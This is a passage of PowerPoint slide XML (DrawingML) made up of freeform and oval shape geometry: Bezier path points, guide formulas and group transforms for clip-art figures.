                      <a:pt x="122" y="214"/>
                      <a:pt x="122" y="214"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="214"/>
                      <a:pt x="123" y="215"/>
                      <a:pt x="123" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="216"/>
                      <a:pt x="125" y="216"/>
                      <a:pt x="125" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="219"/>
                      <a:pt x="135" y="220"/>
                      <a:pt x="140" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="218"/>
                      <a:pt x="146" y="217"/>
                      <a:pt x="148" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="214"/>
                      <a:pt x="151" y="212"/>
                      <a:pt x="152" y="210"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="168" y="171"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="172"/>
                      <a:pt x="168" y="173"/>
                      <a:pt x="168" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="180"/>
                      <a:pt x="164" y="185"/>
                      <a:pt x="158" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="187"/>
                      <a:pt x="153" y="187"/>
                      <a:pt x="151" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="177"/>
                      <a:pt x="158" y="168"/>
                      <a:pt x="158" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="163"/>
                      <a:pt x="166" y="166"/>
                      <a:pt x="168" y="171"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="166" y="138"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="139"/>
                      <a:pt x="167" y="140"/>
                      <a:pt x="167" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="167" y="146"/>
                      <a:pt x="163" y="151"/>
                      <a:pt x="157" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="151"/>
                      <a:pt x="157" y="150"/>
                      <a:pt x="157" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="142"/>
                      <a:pt x="153" y="135"/>
                      <a:pt x="151" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="127"/>
                      <a:pt x="165" y="131"/>
                      <a:pt x="166" y="138"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="155" y="107"/>
                    </a:move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6" y="111"/>
                      <a:pt x="155" y="114"/>
                      <a:pt x="154" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="152" y="119"/>
                      <a:pt x="151" y="121"/>
                      <a:pt x="148" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="115"/>
                      <a:pt x="143" y="109"/>
                      <a:pt x="140" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="101"/>
                      <a:pt x="143" y="100"/>
                      <a:pt x="144" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="98"/>
                      <a:pt x="154" y="102"/>
                      <a:pt x="155" y="107"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="6"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="6"/>
                      <a:pt x="146" y="33"/>
                      <a:pt x="146" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="97"/>
                      <a:pt x="120" y="123"/>
                      <a:pt x="87" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="123"/>
                      <a:pt x="29" y="97"/>
                      <a:pt x="29" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="33"/>
                      <a:pt x="55" y="6"/>
                      <a:pt x="87" y="6"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="20" y="107"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="102"/>
                      <a:pt x="26" y="98"/>
                      <a:pt x="31" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="100"/>
                      <a:pt x="33" y="101"/>
                      <a:pt x="35" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="109"/>
                      <a:pt x="29" y="115"/>
                      <a:pt x="26" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="121"/>
                      <a:pt x="22" y="119"/>
                      <a:pt x="21" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="114"/>
                      <a:pt x="19" y="111"/>
                      <a:pt x="20" y="107"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="141"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="140"/>
                      <a:pt x="8" y="139"/>
                      <a:pt x="9" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="131"/>
                      <a:pt x="17" y="127"/>
                      <a:pt x="24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2" y="135"/>
                      <a:pt x="20" y="142"/>
                      <a:pt x="18" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="150"/>
                      <a:pt x="18" y="151"/>
                      <a:pt x="17" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="151"/>
                      <a:pt x="8" y="146"/>
                      <a:pt x="8" y="141"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="186"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="185"/>
                      <a:pt x="10" y="183"/>
                      <a:pt x="9" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="178"/>
                      <a:pt x="6" y="174"/>
                      <a:pt x="7" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="171"/>
                      <a:pt x="7" y="171"/>
                      <a:pt x="7" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="166"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="168"/>
                      <a:pt x="18" y="177"/>
                      <a:pt x="24" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="187"/>
                      <a:pt x="19" y="187"/>
                      <a:pt x="17" y="186"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="36" y="212"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="211"/>
                      <a:pt x="26" y="206"/>
                      <a:pt x="26" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="199"/>
                      <a:pt x="27" y="198"/>
                      <a:pt x="27" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="195"/>
                      <a:pt x="28" y="194"/>
                      <a:pt x="29" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="198"/>
                      <a:pt x="42" y="203"/>
                      <a:pt x="50" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="211"/>
                      <a:pt x="42" y="214"/>
                      <a:pt x="36" y="212"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="78" y="219"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="221"/>
                      <a:pt x="72" y="222"/>
                      <a:pt x="69" y="221"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="220"/>
                      <a:pt x="63" y="218"/>
                      <a:pt x="61" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="213"/>
                      <a:pt x="59" y="211"/>
                      <a:pt x="59" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="210"/>
                      <a:pt x="75" y="211"/>
                      <a:pt x="84" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="211"/>
                      <a:pt x="84" y="212"/>
                      <a:pt x="84" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="215"/>
                      <a:pt x="81" y="218"/>
                      <a:pt x="78" y="219"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="114" y="215"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="218"/>
                      <a:pt x="109" y="220"/>
                      <a:pt x="106" y="221"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="222"/>
                      <a:pt x="99" y="221"/>
                      <a:pt x="97" y="219"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="218"/>
                      <a:pt x="92" y="215"/>
                      <a:pt x="91" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="211"/>
                      <a:pt x="91" y="211"/>
                      <a:pt x="91" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="211"/>
                      <a:pt x="108" y="210"/>
                      <a:pt x="116" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="208"/>
                      <a:pt x="116" y="208"/>
                      <a:pt x="116" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="211"/>
                      <a:pt x="115" y="213"/>
                      <a:pt x="114" y="215"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="87" y="204"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="204"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="31" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="170"/>
                      <a:pt x="25" y="152"/>
                      <a:pt x="25" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                      <a:pt x="25" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="135"/>
                      <a:pt x="34" y="120"/>
                      <a:pt x="40" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="122"/>
                      <a:pt x="69" y="130"/>
                      <a:pt x="87" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="130"/>
                      <a:pt x="123" y="122"/>
                      <a:pt x="135" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="120"/>
                      <a:pt x="146" y="135"/>
                      <a:pt x="150" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="151"/>
                      <a:pt x="150" y="151"/>
                      <a:pt x="150" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="152"/>
                      <a:pt x="150" y="152"/>
                      <a:pt x="150" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="152"/>
                      <a:pt x="155" y="170"/>
                      <a:pt x="144" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="198"/>
                      <a:pt x="115" y="204"/>
                      <a:pt x="87" y="204"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="147" y="207"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="209"/>
                      <a:pt x="142" y="211"/>
                      <a:pt x="139" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="213"/>
                      <a:pt x="132" y="213"/>
                      <a:pt x="129" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="210"/>
                      <a:pt x="125" y="208"/>
                      <a:pt x="124" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="203"/>
                      <a:pt x="141" y="198"/>
                      <a:pt x="146" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="194"/>
                      <a:pt x="148" y="195"/>
                      <a:pt x="148" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="198"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="148" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="202"/>
                      <a:pt x="148" y="205"/>
                      <a:pt x="147" y="2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6" name="Freeform 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDAAB999-202B-4F5C-AEE3-12AACB1CE4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19" y="2148"/>
                <a:ext cx="324" cy="228"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 124 w 135"/>
                  <a:gd name="T1" fmla="*/ 76 h 95"/>
                  <a:gd name="T2" fmla="*/ 130 w 135"/>
                  <a:gd name="T3" fmla="*/ 43 h 95"/>
                  <a:gd name="T4" fmla="*/ 130 w 135"/>
                  <a:gd name="T5" fmla="*/ 42 h 95"/>
                  <a:gd name="T6" fmla="*/ 130 w 135"/>
                  <a:gd name="T7" fmla="*/ 42 h 95"/>
                  <a:gd name="T8" fmla="*/ 115 w 135"/>
                  <a:gd name="T9" fmla="*/ 0 h 95"/>
                  <a:gd name="T10" fmla="*/ 67 w 135"/>
                  <a:gd name="T11" fmla="*/ 21 h 95"/>
                  <a:gd name="T12" fmla="*/ 20 w 135"/>
                  <a:gd name="T13" fmla="*/ 0 h 95"/>
                  <a:gd name="T14" fmla="*/ 5 w 135"/>
                  <a:gd name="T15" fmla="*/ 42 h 95"/>
                  <a:gd name="T16" fmla="*/ 5 w 135"/>
                  <a:gd name="T17" fmla="*/ 42 h 95"/>
                  <a:gd name="T18" fmla="*/ 5 w 135"/>
                  <a:gd name="T19" fmla="*/ 43 h 95"/>
                  <a:gd name="T20" fmla="*/ 11 w 135"/>
                  <a:gd name="T21" fmla="*/ 76 h 95"/>
                  <a:gd name="T22" fmla="*/ 67 w 135"/>
                  <a:gd name="T23" fmla="*/ 95 h 95"/>
                  <a:gd name="T24" fmla="*/ 124 w 135"/>
                  <a:gd name="T25" fmla="*/ 76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95">
                    <a:moveTo>
                      <a:pt x="124" y="76"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="61"/>
                      <a:pt x="130" y="43"/>
                      <a:pt x="130" y="43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26" y="26"/>
                      <a:pt x="121" y="11"/>
                      <a:pt x="115" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="13"/>
                      <a:pt x="86" y="21"/>
                      <a:pt x="67" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="21"/>
                      <a:pt x="32" y="13"/>
                      <a:pt x="20" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="11"/>
                      <a:pt x="8" y="26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3"/>
                      <a:pt x="0" y="61"/>
                      <a:pt x="11" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="89"/>
                      <a:pt x="40" y="95"/>
                      <a:pt x="67" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="95"/>
                      <a:pt x="114" y="89"/>
                      <a:pt x="124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Oval 62">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3907E207-709B-488D-A1E3-5A6551FB82EA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741" y="1901"/>
                <a:ext cx="281" cy="28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Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B93480-1964-4F1D-8692-2512771D717D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0384769">
              <a:off x="3550356" y="5647699"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="151" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D86178-CEBD-47B5-BD02-5591331C258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2" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4520E36F-A12F-43CC-AFAA-0BB0BFB3A46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9" name="Group 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97093847-DD84-46C5-8589-F81F56EF8992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4752501" y="-20975"/>
              <a:ext cx="1426490" cy="1396254"/>
              <a:chOff x="2208" y="1508"/>
              <a:chExt cx="1321" cy="1293"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="149" name="Freeform 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1214860B-8566-4937-954E-4285E674A10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949" y="1807"/>
                <a:ext cx="580" cy="823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0" name="Freeform 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998F1475-89E5-495C-880E-874CFE95AB5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208" y="1508"/>
                <a:ext cx="1031" cy="1293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0" name="Group 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A734AE-4CC7-4673-BA90-18C3459C694A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1187272">
              <a:off x="2574844" y="-137511"/>
              <a:ext cx="696926" cy="867919"/>
              <a:chOff x="2343" y="1490"/>
              <a:chExt cx="1076" cy="1340"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="144" name="Oval 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D246B9C-7A55-4EB9-9558-D9B68A7386F3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953" y="1699"/>
                <a:ext cx="42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5" name="Oval 73">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A45DFDB-E9BE-4877-83BD-AD65B96F81DE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2767" y="1699"/>
                <a:ext cx="43" cy="45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6" name="Freeform 74">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4881B625-9A55-47AE-B35D-9943EC6C021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67" y="1832"/>
                <a:ext cx="228" cy="81"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 96"/>
                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                  <a:gd name="T2" fmla="*/ 96 w 96"/>
                  <a:gd name="T3" fmla="*/ 34 h 34"/>
                  <a:gd name="T4" fmla="*/ 48 w 96"/>
                  <a:gd name="T5" fmla="*/ 0 h 34"/>
                  <a:gd name="T6" fmla="*/ 0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0" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="34"/>
                      <a:pt x="96" y="34"/>
                      <a:pt x="96" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="24"/>
                      <a:pt x="51" y="2"/>
                      <a:pt x="48" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="2"/>
                      <a:pt x="14" y="24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7" name="Freeform 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5367023-81C8-479F-A2A9-E74E78D283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767" y="1930"/>
                <a:ext cx="228" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 96"/>
                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                  <a:gd name="T2" fmla="*/ 96 w 96"/>
                  <a:gd name="T3" fmla="*/ 0 h 34"/>
                  <a:gd name="T4" fmla="*/ 0 w 96"/>
                  <a:gd name="T5" fmla="*/ 0 h 34"/>
                  <a:gd name="T6" fmla="*/ 48 w 96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34">
                    <a:moveTo>
                      <a:pt x="48" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="31"/>
                      <a:pt x="83" y="10"/>
                      <a:pt x="9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4" y="10"/>
                      <a:pt x="45" y="31"/>
                      <a:pt x="48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Freeform 76">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30005D5-B410-4336-AFA8-344FCB1C881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343" y="1490"/>
                <a:ext cx="1076" cy="1340"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 452 w 452"/>
                  <a:gd name="T1" fmla="*/ 402 h 564"/>
                  <a:gd name="T2" fmla="*/ 367 w 452"/>
                  <a:gd name="T3" fmla="*/ 269 h 564"/>
                  <a:gd name="T4" fmla="*/ 360 w 452"/>
                  <a:gd name="T5" fmla="*/ 135 h 564"/>
                  <a:gd name="T6" fmla="*/ 226 w 452"/>
                  <a:gd name="T7" fmla="*/ 0 h 564"/>
                  <a:gd name="T8" fmla="*/ 92 w 452"/>
                  <a:gd name="T9" fmla="*/ 135 h 564"/>
                  <a:gd name="T10" fmla="*/ 85 w 452"/>
                  <a:gd name="T11" fmla="*/ 269 h 564"/>
                  <a:gd name="T12" fmla="*/ 0 w 452"/>
                  <a:gd name="T13" fmla="*/ 402 h 564"/>
                  <a:gd name="T14" fmla="*/ 83 w 452"/>
                  <a:gd name="T15" fmla="*/ 406 h 564"/>
                  <a:gd name="T16" fmla="*/ 83 w 452"/>
                  <a:gd name="T17" fmla="*/ 558 h 564"/>
                  <a:gd name="T18" fmla="*/ 83 w 452"/>
                  <a:gd name="T19" fmla="*/ 564 h 564"/>
                  <a:gd name="T20" fmla="*/ 369 w 452"/>
                  <a:gd name="T21" fmla="*/ 564 h 564"/>
                  <a:gd name="T22" fmla="*/ 369 w 452"/>
                  <a:gd name="T23" fmla="*/ 552 h 564"/>
                  <a:gd name="T24" fmla="*/ 369 w 452"/>
                  <a:gd name="T25" fmla="*/ 552 h 564"/>
                  <a:gd name="T26" fmla="*/ 369 w 452"/>
                  <a:gd name="T27" fmla="*/ 406 h 564"/>
                  <a:gd name="T28" fmla="*/ 452 w 452"/>
                  <a:gd name="T29" fmla="*/ 402 h 564"/>
                  <a:gd name="T30" fmla="*/ 265 w 452"/>
                  <a:gd name="T31" fmla="*/ 69 h 564"/>
                  <a:gd name="T32" fmla="*/ 293 w 452"/>
                  <a:gd name="T33" fmla="*/ 98 h 564"/>
                  <a:gd name="T34" fmla="*/ 265 w 452"/>
                  <a:gd name="T35" fmla="*/ 126 h 564"/>
                  <a:gd name="T36" fmla="*/ 237 w 452"/>
                  <a:gd name="T37" fmla="*/ 98 h 564"/>
                  <a:gd name="T38" fmla="*/ 265 w 452"/>
                  <a:gd name="T39" fmla="*/ 69 h 564"/>
                  <a:gd name="T40" fmla="*/ 226 w 452"/>
                  <a:gd name="T41" fmla="*/ 135 h 564"/>
                  <a:gd name="T42" fmla="*/ 293 w 452"/>
                  <a:gd name="T43" fmla="*/ 181 h 564"/>
                  <a:gd name="T44" fmla="*/ 226 w 452"/>
                  <a:gd name="T45" fmla="*/ 228 h 564"/>
                  <a:gd name="T46" fmla="*/ 159 w 452"/>
                  <a:gd name="T47" fmla="*/ 181 h 564"/>
                  <a:gd name="T48" fmla="*/ 224 w 452"/>
                  <a:gd name="T49" fmla="*/ 137 h 564"/>
                  <a:gd name="T50" fmla="*/ 226 w 452"/>
                  <a:gd name="T51" fmla="*/ 135 h 564"/>
                  <a:gd name="T52" fmla="*/ 187 w 452"/>
                  <a:gd name="T53" fmla="*/ 69 h 564"/>
                  <a:gd name="T54" fmla="*/ 216 w 452"/>
                  <a:gd name="T55" fmla="*/ 98 h 564"/>
                  <a:gd name="T56" fmla="*/ 187 w 452"/>
                  <a:gd name="T57" fmla="*/ 126 h 564"/>
                  <a:gd name="T58" fmla="*/ 159 w 452"/>
                  <a:gd name="T59" fmla="*/ 98 h 564"/>
                  <a:gd name="T60" fmla="*/ 187 w 452"/>
                  <a:gd name="T61" fmla="*/ 69 h 564"/>
                  <a:gd name="T62" fmla="*/ 116 w 452"/>
                  <a:gd name="T63" fmla="*/ 552 h 564"/>
                  <a:gd name="T64" fmla="*/ 159 w 452"/>
                  <a:gd name="T65" fmla="*/ 527 h 564"/>
                  <a:gd name="T66" fmla="*/ 202 w 452"/>
                  <a:gd name="T67" fmla="*/ 552 h 564"/>
                  <a:gd name="T68" fmla="*/ 116 w 452"/>
                  <a:gd name="T69" fmla="*/ 552 h 564"/>
                  <a:gd name="T70" fmla="*/ 214 w 452"/>
                  <a:gd name="T71" fmla="*/ 552 h 564"/>
                  <a:gd name="T72" fmla="*/ 159 w 452"/>
                  <a:gd name="T73" fmla="*/ 515 h 564"/>
                  <a:gd name="T74" fmla="*/ 131 w 452"/>
                  <a:gd name="T75" fmla="*/ 520 h 564"/>
                  <a:gd name="T76" fmla="*/ 133 w 452"/>
                  <a:gd name="T77" fmla="*/ 381 h 564"/>
                  <a:gd name="T78" fmla="*/ 229 w 452"/>
                  <a:gd name="T79" fmla="*/ 267 h 564"/>
                  <a:gd name="T80" fmla="*/ 321 w 452"/>
                  <a:gd name="T81" fmla="*/ 386 h 564"/>
                  <a:gd name="T82" fmla="*/ 322 w 452"/>
                  <a:gd name="T83" fmla="*/ 523 h 564"/>
                  <a:gd name="T84" fmla="*/ 289 w 452"/>
                  <a:gd name="T85" fmla="*/ 515 h 564"/>
                  <a:gd name="T86" fmla="*/ 233 w 452"/>
                  <a:gd name="T87" fmla="*/ 552 h 564"/>
                  <a:gd name="T88" fmla="*/ 214 w 452"/>
                  <a:gd name="T89" fmla="*/ 552 h 564"/>
                  <a:gd name="T90" fmla="*/ 246 w 452"/>
                  <a:gd name="T91" fmla="*/ 552 h 564"/>
                  <a:gd name="T92" fmla="*/ 289 w 452"/>
                  <a:gd name="T93" fmla="*/ 527 h 564"/>
                  <a:gd name="T94" fmla="*/ 332 w 452"/>
                  <a:gd name="T95" fmla="*/ 552 h 564"/>
                  <a:gd name="T96" fmla="*/ 246 w 452"/>
                  <a:gd name="T97" fmla="*/ 552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52" h="564">
                    <a:moveTo>
                      <a:pt x="452" y="402"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="372"/>
                      <a:pt x="373" y="323"/>
                      <a:pt x="367" y="269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="366" y="209"/>
                      <a:pt x="364" y="156"/>
                      <a:pt x="360" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="62"/>
                      <a:pt x="313" y="0"/>
                      <a:pt x="226" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="0"/>
                      <a:pt x="104" y="62"/>
                      <a:pt x="92" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="156"/>
                      <a:pt x="86" y="209"/>
                      <a:pt x="85" y="269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="323"/>
                      <a:pt x="57" y="372"/>
